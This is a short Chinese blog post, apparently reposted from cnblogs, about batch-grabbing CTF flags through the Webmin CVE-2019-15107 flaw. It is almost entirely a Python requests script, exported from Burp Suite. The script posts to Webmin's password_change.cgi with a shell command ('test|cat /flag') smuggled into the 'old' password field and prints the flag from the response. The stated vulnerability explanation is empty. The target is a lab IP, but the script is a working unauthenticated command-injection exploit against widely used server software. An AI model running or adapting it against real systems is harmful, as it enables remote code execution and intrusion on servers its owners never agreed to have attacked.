python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)
作者:互联网
webmin漏洞CVE-2019-15107 漏洞原理:
使用burpsuit的右键copy as requests
burp0_url = "https://192.168.184.128:10000/password_change.cgi" burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"} burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"} flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
需要处理一下post数据的返回编码,和https的交互问题,需要安装一个openssl的python库和引用库模块,将warning忽略掉
代码如下
1 import requests 2 requests.packages.urllib3.disable_warnings() 3 4 5 burp0_url = "https://192.168.184.128:10000/password_change.cgi" 6 burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"} 7 burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"} 8 burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"} 9 flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False) 10 11 # with open("./1.txt", "w") as f: 12 # print(type(flag.content.decode("gbk"))) 13 # f.write(flag.content.decode("gbk")) 14 findflag = flag.content.decode("gbk") 15 result = "flag" in findflag 16 indexstart = findflag.find("flag") 17 print(findflag[indexstart:indexstart+11]) 18 # print(result)
标签:插件,burp0,python,cookies,webmin,headers,flag,requests,data 来源: https://www.cnblogs.com/R1card0/p/11406011.html